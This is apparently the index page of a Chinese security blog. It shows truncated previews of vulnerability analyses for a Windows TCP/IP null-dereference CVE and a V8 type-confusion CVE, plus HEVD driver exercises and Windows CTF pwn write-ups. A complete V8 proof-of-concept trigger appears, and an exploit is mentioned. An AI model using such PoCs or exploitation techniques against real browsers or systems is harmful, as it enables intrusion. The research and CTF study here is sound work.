CVE-2021-24086 :TCPIP 中的空指针解引用漏洞
信息收集patch 位于 tcpip.sys 中的 Ipv6pReassembleDatagram 函数,对某一个变量的大小进行了约束,使其不能超过 0xffff
并且下方的 NdisGetDataBuffer 传入的第二个参数 BytesNeeded 不再截断到两个字节
从直觉上来看这应该是个对 length 的检查,不过这个 length 是怎么来的还要进一步分析
使用公开的 poc ,更改 iface
1parser.add_argument('--iface', default = "VMware Network Adapter VMnet8")
然后执行,发现崩溃,崩溃信息如下
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394 ...
CVE-2021-30517 :V8 IC 中的类型混淆漏洞
信息收集该 CVE 对应的 Issue 为 Issue 1203122 ,是一个类型混淆的洞。同时非常贴心的给了 Poc
12345678910111213141516171819202122function main() { class C { m() { super.prototype } } function f() {} C.prototype.__proto__ = f let c = new C() c.x0 = 1 c.x1 = 1 c.x2 = 1 c.x3 = 1 c.x4 = 0x42424242 / 2 f.prototype c.m()}for (let i = 0; i < 0x100; ++i) { main()}
还有 EXP
123456789101112131415161718192021222324252627282 ...
HEVD - Arbitrary Write
源码HackSysExtremeVulnerableDriver.h12345//// IOCTL Definitions//#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802)
HackSysExtremeVulnerableDriver.c12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455/// <summary>/// IRP Device IoCtl Handler/// </summary>/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>/// <param name="Irp">The pointer to IRP</param> ...
HEVD - Buffer Overflow Stack
源码HackSysExtremeVulnerableDriver.h12345//// IOCTL Definitions//#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800)
HackSysExtremeVulnerableDriver.c12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455/// <summary>/// IRP Device IoCtl Handler/// </summary>/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>/// <param name="Irp">The pointer to IRP</param> ...
2019OGeek - babyheap
保护检查1234567891011121314Results for: .\babyheap.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "NotPresent"RFG : "NotPresent"SafeSEH : "NotPresent"GS : "Present"Authenticode : "NotP ...
2017HITB GSEC - babyshellcode
保护检查1234567891011121314Results for: .\babyshellcode.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "Present"RFG : "NotPresent"SafeSEH : "NotPresent"GS : "Present"Authenticode : "No ...
2017Insomnihack - easywin
保护检查1234567891011121314Results for: .\easywin.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "Present"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "Present"RFG : "NotPresent"SafeSEH : "NotApplicable"GS : "Present"Authenticode : "NotPrese ...
2017HITB GSEC - babystack
保护检查1234567891011121314Results for: .\babystack.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "Present"RFG : "NotPresent"SafeSEH : "NotPresent"GS : "Present"Authenticode : "NotPre ...
2020强网杯 - easyoverflow
保护检查1234567891011121314Results for: .\StackOverflow.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "Present"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "NotPresent"RFG : "NotPresent"SafeSEH : "NotApplicable"GS : "Present"Authenticode : " ...
PE32 - Advanced stack buffer overflow
服务交互SSH连接12ssh -p 2225 app-systeme-ch73@challenge05.root-me.orgapp-systeme-ch73
SCP下载文件1scp -r app-systeme-ch73@challenge05.root-me.org:/challenge/app-systeme/ch73/ch73.exe ./
题目分析首先检查保护:
1234567891011121314Results for: .\ch73.exeDynamic Base : "NotPresent"ASLR : "NotPresent"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "NotPresent"SEH : "Present ...